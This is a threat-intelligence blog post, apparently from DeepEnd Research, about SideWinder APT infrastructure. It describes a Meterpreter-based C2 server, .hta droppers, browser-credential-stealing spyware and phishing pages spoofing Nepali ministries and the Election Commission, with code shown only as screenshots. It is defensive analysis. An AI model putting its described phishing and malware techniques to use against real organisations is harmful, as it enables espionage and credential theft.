tag:blogger.com,1999:blog-748279296525688952024-03-05T10:24:24.380-05:00DeepEnd ResearchMila Parkourhttp://www.blogger.com/profile/05026389826489033821noreply@blogger.comBlogger22125tag:blogger.com,1999:blog-74827929652568895.post-29282386596075825342021-03-08T11:40:00.003-05:002021-03-08T14:58:25.825-05:00Renewed SideWinder Activity in South AsiaA few months ago, <a href="https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html">Trend Micro released a post</a> which encapsulated the SideWinder APT group activity in the past year, showcasing SideWinder’s mobile malware development aspirations and spear phishing campaigns targeting the government and military of Nepal, the government of Afghanistan, the Myanma Posts and Telecommunications state owned company, the Chinese Ministry of Foreign Affairs, and several other entities. <br /><br />The SideWinder APT which is also tracked as RAZOR TIGER, APT-C-17, and Rattlesnake is known to pick its targets in the South Asia region in multiple previous campaigns [<a href="https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html">1</a>, <a href="https://securelist.com/apt-trends-report-q1-2018/85280/">2</a>, <a href="https://s.tencent.com/research/report/479.html">3</a>]. SideWinder’s targets mainly consist of the countries of Nepal, Pakistan, Afghanistan, and China along with some other target countries from the group’s known past activity. This threat group is somewhat believed to be associated with Indian interests and seems to mainly choose to target government and military entities in its espionage attacks. <br /><br />While we were hunting through world scan data provided by BinaryEdge, we encountered an interesting server during our research which was hosting an executable file that led us on a path to uncover a renewed set of activity being conducted by the SideWinder group - picking right where they left off from in their previous year of operation.<div><br /></div><div><u>Key Findings:</u><br /><ul style="text-align: left;"><li>The group renewed its spear phishing activity with new domains registered targeting government entities in Nepal.</li><li>Nepal recently cancelled its upcoming elections scheduled for 30 April and 10 May 2021.</li><li>Uncovered evidence of the group likely targeting Nepal's Election Commission.</li><li>Evidence of continued efforts of malware development being conducted by the group.</li></ul><div><span style="color: #ffa400; font-family: inherit; font-size: x-large; text-decoration-line: underline; white-space: pre-wrap;"><br /></span></div><div style="text-align: center;"><span style="color: #ffa400; font-family: inherit; text-decoration-line: underline; white-space: pre-wrap;"><span style="font-size: medium;">Command and Control</span></span></div><p></p>The server which was the initial point in our investigation was hosting the following shellcode we identified in the scan response we checked on port 8087.<div> <span id="docs-internal-guid-d83bef61-7fff-7011-8729-5c8ef44020f7"><span><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p></span></span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Ow6580z-Hss4UIbnpYvhdlk26o1e-2uuYWO4ZY0-MsJfVfpTViY1RZr6CT8UO-1xyHKAPrr2HtmsbAM8KvGeShGaoYsYufIJyR4S7eN9CYVqkfTAdYhkSvoWpy5jDKJQUnbXHQvBRSl/s954/1.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="284" data-original-width="954" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp4Ow6580z-Hss4UIbnpYvhdlk26o1e-2uuYWO4ZY0-MsJfVfpTViY1RZr6CT8UO-1xyHKAPrr2HtmsbAM8KvGeShGaoYsYufIJyR4S7eN9CYVqkfTAdYhkSvoWpy5jDKJQUnbXHQvBRSl/w640-h190/1.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Server's raw response showing an expected C2 domain connection.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div></span></span>Outputting this raw data for initial analysis and triage, we managed to figure out this was most likely 2nd stage malware being used for Command and Control purposes through this server.</div><div> <span><span><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIqfN-PFj8dZYIs_poo7uibeVuAJQtpDnXJlVKAzuqdvM3iT7Az7U8cDsOF4QbrhX8dLq_SNQULctPnc-OynYAhTnymgqUNoSyEx4rgRZiGT2QupKMhcvzqCiGUfu3WYfleOuLdU4mArPg/s569/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="569" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIqfN-PFj8dZYIs_poo7uibeVuAJQtpDnXJlVKAzuqdvM3iT7Az7U8cDsOF4QbrhX8dLq_SNQULctPnc-OynYAhTnymgqUNoSyEx4rgRZiGT2QupKMhcvzqCiGUfu3WYfleOuLdU4mArPg/w400-h359/2.png" width="400" /></a></div></span></span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb0L2BJd0444f1yd_g4NeI_g9LYrCb12jwC4OGRp7WtsNgJmXSVuKJLBcZcfjqQ1acso52MrV8UKYeCEZmyIoXMJQEKqRXk23xGxAU0pQ977DX9lG9bodfH9oyxw2jUl9hoDVsnEa45mhj/s758/libraries.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="189" data-original-width="758" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb0L2BJd0444f1yd_g4NeI_g9LYrCb12jwC4OGRp7WtsNgJmXSVuKJLBcZcfjqQ1acso52MrV8UKYeCEZmyIoXMJQEKqRXk23xGxAU0pQ977DX9lG9bodfH9oyxw2jUl9hoDVsnEa45mhj/w640-h160/libraries.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">PE-Studio showing us the malware's used libraries, headers, references, and compilation date.</td></tr></tbody></table><div style="text-align: left;"><br /></div><div style="text-align: left;">And as we continued our search throughout the server, we realized that it was also communicating with what looked to be 1st stage malware via port 8085. We think that such 1st stage malware is being used in SideWinder’s spear phishing attacks, and we suspect that a sample of one was <a href="https://www.virustotal.com/gui/file/66dcaaa42e3f36f0560af741017c13c528758140f0f7f4260b9213739ffd9e70/">uploaded in January</a> to VirusTotal.</div><div style="text-align: left;"><span style="font-family: inherit; font-size: 11pt; text-align: center; white-space: pre-wrap;"> </span></div>Upon further search, we managed to find the 2nd stage payload that was being used by the group and hosted on this server via a simple text file encoded in Base64. After a straightforward decode, we were able to see the code used by the threat actor for the 2nd stage payload they are utilizing.<span><blockquote style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXbEp63DNpfhhciLgRMSGy5hUUpBmoB252P2EluMKmHsMX2X8owWtZ97PpmTzfswpnF1wuldMbaMzHw8S7pbPrnD3wGqg3aGOBqux4QERB8ZcEGYNjdSjVYk-7zvhOEDdl-hqFr4G68IM6/s635/meterpy.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="576" data-original-width="635" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXbEp63DNpfhhciLgRMSGy5hUUpBmoB252P2EluMKmHsMX2X8owWtZ97PpmTzfswpnF1wuldMbaMzHw8S7pbPrnD3wGqg3aGOBqux4QERB8ZcEGYNjdSjVYk-7zvhOEDdl-hqFr4G68IM6/s16000/meterpy.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Meterpreter 2nd Stage Payload code excerpt.</td></tr></tbody></table><div dir="ltr" style="margin-left: 0pt; text-align: center;"><br /></div></blockquote></span>We immediately had our assumption verified, as we were able to see that the server is being used for command and control purposes using a meterpreter based payload written in Python.</div><div><br /><span><div style="text-align: center;"><span style="color: #ffa400; font-family: inherit; text-decoration-line: underline; white-space: pre-wrap;"><span style="font-family: inherit; font-size: medium;">First Stage Payload</span></span></div><p></p><p style="font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;">An example of what we suspect this group is using that precedes the command and control infrastructure we first laid eyes on was this malware file uploaded to VirusTotal:</p><p style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"></p></span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0TuyQIM3x0m_w5BOEx987_Tvto-K3-fH4FEihD0NFWOm4kO42zD5ZFtDmSSGA0uxBi1tn7EieGAIjMJygDOQaNUSM6lFeDs94ww0AVJqg-JNH-zSjaJAvzzeC5zbaoOS-sOOK4MKhqyX1/s770/3.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="378" data-original-width="770" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0TuyQIM3x0m_w5BOEx987_Tvto-K3-fH4FEihD0NFWOm4kO42zD5ZFtDmSSGA0uxBi1tn7EieGAIjMJygDOQaNUSM6lFeDs94ww0AVJqg-JNH-zSjaJAvzzeC5zbaoOS-sOOK4MKhqyX1/w640-h314/3.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">An .hta file most likely attached to spear phishing emails.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><span></span></div><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><br /></div><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;">We suspect that this actor is using malicious <a href="https://www.virustotal.com/gui/file/ddc19d1421e2eed9c606c4249fab0662f1253e441da2f1285242cb03d5be5b32/detection">.hta files</a> that are attached to emails containing links to decoy document lures along with embedded 1st stage malware inside the hta files. Here we see such an embedded link to a PE-file being disguised as a txt file being used to deploy spyware upon execution.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span><span id="docs-internal-guid-a4cf7889-7fff-4d5c-738f-ea3082331513"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">Once this spyware is downloaded the malware will check for the environment it’s running in and attempt to identify the infected machine’s IP address with an external HTTP request.</p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p></span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn0KFrbYAwC5XOmJVh3-B7l-e-yxvkORsz0QpVRSubx9w91JkVXdC9Y_A5Tax9CBPUn1kFJnlmbOopXBSLzd8pi1Bl-H1DIPKNspnBQzNIrc1v_NQn9BZ8_mvD2iX50YaqhUU5ZryhKnxH/s655/4.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="343" data-original-width="655" height="336" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhn0KFrbYAwC5XOmJVh3-B7l-e-yxvkORsz0QpVRSubx9w91JkVXdC9Y_A5Tax9CBPUn1kFJnlmbOopXBSLzd8pi1Bl-H1DIPKNspnBQzNIrc1v_NQn9BZ8_mvD2iX50YaqhUU5ZryhKnxH/w640-h336/4.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">External request to an online IP check API.</td></tr></tbody></table></span></span><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></div>Another Python based malware, this specific sample runs in the background after execution and creates a database file of extracted logins from browser files, creates archived files of all of the infected machine's downloads, documents, and desktop files to a then daunting task of exfiltration.</div><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKzAZLqIZY2QJ2p3amNsgHLSMD35wVGwVGxX8e1oAOCU5LePPdYsdN_3Uwf-HYYdwN7WzRv8UORU3vv0rji6dFYD6UZRhiKZAZKKP5nsyK3aAnvVKkl_M6efJ4xkKoTF8VGarZB9zlpLAo/s920/6.png" style="margin-left: auto; margin-right: auto;"><span style="color: black;"><img border="0" data-original-height="220" data-original-width="920" height="154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKzAZLqIZY2QJ2p3amNsgHLSMD35wVGwVGxX8e1oAOCU5LePPdYsdN_3Uwf-HYYdwN7WzRv8UORU3vv0rji6dFYD6UZRhiKZAZKKP5nsyK3aAnvVKkl_M6efJ4xkKoTF8VGarZB9zlpLAo/w640-h154/6.png" width="640" /></span></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Utilizing the WriteFile function to write the stolen data to files.</td></tr></tbody></table>Immediately after execution the malware attempts to steal files, writing the stolen browser data to a "Loginvault.db" file and .zip files using the folder location, the machine's IP address and datestamp as the naming scheme.<br /><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDPlijxTFnBqgD1PfJTe3AyFUsGxKCyQLPZipPsewU4wfFu9BUVb2ekcWhk0Cm92BPXN1emTJHBTsZuaqrhyJxI8DsiQ9na3kgs6yZWqZtBGBlaFpTmJ-ciaFaDRZCXudNsBuq22-zH2Nc/s932/7.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="385" data-original-width="932" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDPlijxTFnBqgD1PfJTe3AyFUsGxKCyQLPZipPsewU4wfFu9BUVb2ekcWhk0Cm92BPXN1emTJHBTsZuaqrhyJxI8DsiQ9na3kgs6yZWqZtBGBlaFpTmJ-ciaFaDRZCXudNsBuq22-zH2Nc/w640-h264/7.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Exfiltration attempt to the C2 server using port 8080.</td></tr></tbody></table><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: center; vertical-align: baseline;"><br /></div></span></span>This spyware sample takes us directly to the spear phishing efforts we suspect SideWinder may be conducting while using similar malware techniques.</div><div><span><span><div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><br /></div><span id="docs-internal-guid-e32062aa-7fff-d69b-c831-dc1feeb8baf1"><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; vertical-align: baseline;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;"><span style="color: #ffa400; font-family: inherit; font-size: medium;">Spear Phishing</span></span></p></span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; vertical-align: baseline;"><span style="font-family: Arial; font-size: 11pt; white-space: pre-wrap;"><br /></span></p></span></span></span>Another finding that we encountered while searching through the contents and configurations of this server were the decoy pages SideWinder is using to phish against their intended targets. When we looked at what was being hosted we were surprised to find the server as a single staging point for a lot of the group’s phishing activity (on top of some mobile malware development efforts we cover further along in the post). <br /><br />The server we were investigating was using various dynamic DNS resolutions to the main IP address and resolving almost all of the domain names with naming schemes that mimic the naming convention of the real entities SideWinder are targeting. <br /><br />SideWinder are still very adamant at focusing their attention on the same entities they’ve previously attempted to target as showcased by Trend Micro’s report, while adding some additional in-country organizations to their target list. <br /><br />As of the last few weeks, it seems this group has renewed its activity and started to ramp up attack efforts against their targets of choice. For example, through our investigation of the server, we’ve managed to find that the group is renewing their efforts against government entities of Nepal and setting up phishing infrastructure to launch such campaigns. <br /><br />In our findings, it seems that SideWinder has added the Ministry of Physical Infrastructure and Transport of Nepal to their list of targets and are still actively trying to gain access to other government offices of the country.</div><div><br /><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7U6NN_fwR4eOEHtXDib_7P5YqsBPurVcLC5-x3GknJewfSAyZXs1v155ZRll9_fk3oHz4y2BkdCvBAy1gsFN_qofsfuN0O0ZJ3hNy0bqnNTHu5aBtmyZvxi3tt9nuZAmxnougUP8Bim3_/s1327/8.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="931" data-original-width="1327" height="450" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7U6NN_fwR4eOEHtXDib_7P5YqsBPurVcLC5-x3GknJewfSAyZXs1v155ZRll9_fk3oHz4y2BkdCvBAy1gsFN_qofsfuN0O0ZJ3hNy0bqnNTHu5aBtmyZvxi3tt9nuZAmxnougUP8Bim3_/w640-h450/8.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Ministry of Physical Infrastructure and Transport of Nepal domain and login panel.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span>Another such target in Nepal is the Ministry of Foreign Affairs with a preceding lure intended on motivating the recipient to login with their credentials to be able to continue reading the decoy article planted by the threat actor. In this case, a press release by the Nepal Mission to the UN pertaining to the COVID-19 situation around the region, and human rights issues.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><span><span><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPaepBnTJY8xwHlYgttjxwylJO27h-knNjslTxeKIdPS6mGLI6fhN9QluUew-EyHpbSt6Nz5hrAtQISnDV9ZL6pupE-TO8yEKHDPMIaZ68nQB64WfJ20uuVuJxemb3oZyoBPCEmigEzxRr/s1920/9.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="930" data-original-width="1920" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPaepBnTJY8xwHlYgttjxwylJO27h-knNjslTxeKIdPS6mGLI6fhN9QluUew-EyHpbSt6Nz5hrAtQISnDV9ZL6pupE-TO8yEKHDPMIaZ68nQB64WfJ20uuVuJxemb3oZyoBPCEmigEzxRr/w640-h310/9.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">Ministry of Foreign Affairs decoy lure.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span>A short while after accessing the link the unsuspecting reader will be redirected to the Ministry’s login page.</div><div style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /><div class="separator" style="clear: both;"><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQNfZ67_Sr_YHgcvCXNfX0Hq2ATOc2O_g5zx9pd1P8cn73bHS83jkpaWX7hdDPhhUsybbvsr5EJXYhWUOYuj-vgjtddRjTkmJTbfTKGnGHWO-Z1EwnOrTk6PlQLQ6-vh6PcIt-PO0Dhmg/s1920/10.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="928" data-original-width="1920" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQNfZ67_Sr_YHgcvCXNfX0Hq2ATOc2O_g5zx9pd1P8cn73bHS83jkpaWX7hdDPhhUsybbvsr5EJXYhWUOYuj-vgjtddRjTkmJTbfTKGnGHWO-Z1EwnOrTk6PlQLQ6-vh6PcIt-PO0Dhmg/w640-h310/10.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><span style="text-align: left;">After a redirect from the lure article, the reader is redirected to this login panel.</span></td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div>Here <a href="https://github.com/omriher/CapTipper">CapTipper</a></span> is showcasing us the ~15 seconds it takes to get redirected from the initial decoy article to the login panel.</div><div class="separator" style="clear: both;"><br /><span><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SL_Gr2R0rrFs4JESs5S-53uifykXn8ftb5Qq4FjgEKTV0EZ76SUrWP5STiXnqcc6Fh6thl94IBAO0ZjI0ZHp66FpWWzC992rsV6QwnKLzqxtCBtmpHxdYWWDUeuiJCZamtCBQeQlj_d9/s1717/11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="773" data-original-width="1717" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SL_Gr2R0rrFs4JESs5S-53uifykXn8ftb5Qq4FjgEKTV0EZ76SUrWP5STiXnqcc6Fh6thl94IBAO0ZjI0ZHp66FpWWzC992rsV6QwnKLzqxtCBtmpHxdYWWDUeuiJCZamtCBQeQlj_d9/w640-h288/11.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: left;"><br /></div></span>The phishing efforts being conducted by the group in this activity are reliant on the content delivery backbone of the actual target website to deliver all of the page's media and redirect to it once credentials are entered. Meaning the actor controlled server just hosts basic phishing kits which use the target's own content delivery network to mimic the respective login panel which they are targeting. </div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><span><span><span><span><span style="font-family: Arial;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD7B5CtxW2-Hu-iUIEpkmTxmL7MFdxxHq34vOiDWPjDPnrCBH7Ftxsm7OG_yewESecyTrIoiKBFqXVjvJdJrMRIBZNbxwqJ69vX18NpZXdu5mvw6WbhrgdzpA11ctua4fgYsvJcRj7S2ik/s1144/12.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="173" data-original-width="1144" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgD7B5CtxW2-Hu-iUIEpkmTxmL7MFdxxHq34vOiDWPjDPnrCBH7Ftxsm7OG_yewESecyTrIoiKBFqXVjvJdJrMRIBZNbxwqJ69vX18NpZXdu5mvw6WbhrgdzpA11ctua4fgYsvJcRj7S2ik/w640-h96/12.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">The fake page making lookup requests to the real Nepal Foreign Affairs government website.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span>Some other decoy tricks that are being employed by the group in this campaign are error messages hardcoded in the phishing pages. Such as the one in a phishing page spoofing the Nepal central government email system:</div><div class="separator" style="clear: both;"><br /><span><span><span><span><span style="font-family: Arial;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBc1oZ-KH5clLLEx4_LihiwfKnZFmJUq6HOK_cyFzYZENmWfTeVCx2ifOB3KODTzXhQJxH9b2SoFd3oen5VXap132fU0-ss9Uuavxjj_KUTu-HzSY7KmmMCOav2axIbp2AZRZAxPrvz2Ek/s1654/13.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="757" data-original-width="1654" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBc1oZ-KH5clLLEx4_LihiwfKnZFmJUq6HOK_cyFzYZENmWfTeVCx2ifOB3KODTzXhQJxH9b2SoFd3oen5VXap132fU0-ss9Uuavxjj_KUTu-HzSY7KmmMCOav2axIbp2AZRZAxPrvz2Ek/w640-h292/13.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Source code showing the hardcoded error message.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span>Or an additional one hardcoded in the phishing page targeting the Ministry of Defense:</div><div class="separator" style="clear: both;"><br /><div class="separator" style="clear: both; text-align: left;"><span><span><span><span><span style="font-family: Arial;"><span><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKMl6tLh2cEjZJVQnaNejkjY4GJVManYIRYMNwr4tt14ZOWBbE3eBxveN36yruMLQTZWmpEsXWFukCGeyVx996tUZhSEkJSAuht4hV5pCs7pwr53P_Hdsm-D1LZDgc60Sf_NukFBDGQp98/s695/14.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="604" data-original-width="695" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKMl6tLh2cEjZJVQnaNejkjY4GJVManYIRYMNwr4tt14ZOWBbE3eBxveN36yruMLQTZWmpEsXWFukCGeyVx996tUZhSEkJSAuht4hV5pCs7pwr53P_Hdsm-D1LZDgc60Sf_NukFBDGQp98/w400-h348/14.png" width="400" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Ministry of Defense login panel with a hardcoded error.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span><div class="separator" style="clear: both;">We imagine this is a social engineering tactic employed by the actor in efforts of achieving further enticement to enter login credentials by adding pretext to complete the action.<br /><br />We have also witnessed renewed attention in efforts against organizations such as the Nepal state owned Nepal Telecom company, while continuing the techniques of utilizing the real website’s content backbone including the reCaptcha widget.</div><div class="separator" style="clear: both;"><br /><span><span><span><span><span style="font-family: Arial;"><span><span><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeSe17Qm6WScaj19lKb7ysbDamu9DkiA8owxyperHJ-gY3CijWkDd6RkCASIdQvfdGsCA1ckmKwXLJYb7sGfnGJtcHNgY8kcly6YI-q1wZXgnspC1eX2OBQazMShAefR9O3o2Kn2kdRuq/s1920/15.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="918" data-original-width="1920" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzeSe17Qm6WScaj19lKb7ysbDamu9DkiA8owxyperHJ-gY3CijWkDd6RkCASIdQvfdGsCA1ckmKwXLJYb7sGfnGJtcHNgY8kcly6YI-q1wZXgnspC1eX2OBQazMShAefR9O3o2Kn2kdRuq/w640-h306/15.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Nepal Telecom phishing page piggybacking the reCaptcha widget.</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span><div>As you can see, the SideWinder group is still very interested in targeting entities located in Nepal. With an additionally very interesting phishing page we managed to find being hosted on this server to what we think is also a current and new target focus for the group.</div><div><span style="font-family: Arial;"><br /></span>This new phishing target seems to be the Election Commission of Nepal:</div><div><br /><span><span><span><span><span style="font-family: Arial;"><span><span><span><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFeB9i1PyQp_5cpVAddWsB_RhHL_pV99BhiQnUO-UIolO8SmxD-OWmX9pImX3SbzU9c9ZeFzbbnXIRqN-T8qrhYfYEX4zkcEn6RB-HZE2SFk6Hi9Iyu-5etMeicxFPFWTk4eVslTjvFj0G/s1427/16.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="777" data-original-width="1427" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFeB9i1PyQp_5cpVAddWsB_RhHL_pV99BhiQnUO-UIolO8SmxD-OWmX9pImX3SbzU9c9ZeFzbbnXIRqN-T8qrhYfYEX4zkcEn6RB-HZE2SFk6Hi9Iyu-5etMeicxFPFWTk4eVslTjvFj0G/w640-h348/16.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">A phishing page targeting the Election Commission of Nepal</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span></span>As we've shown previously, the actor is again utilizing the same tactic of loading the content from the real government website and redirecting to it once credentials are entered:</div><div><span><span><span><span><span style="font-family: Arial;"><span><span><span><p></p><div class="separator" style="clear: both; text-align: center;"><a 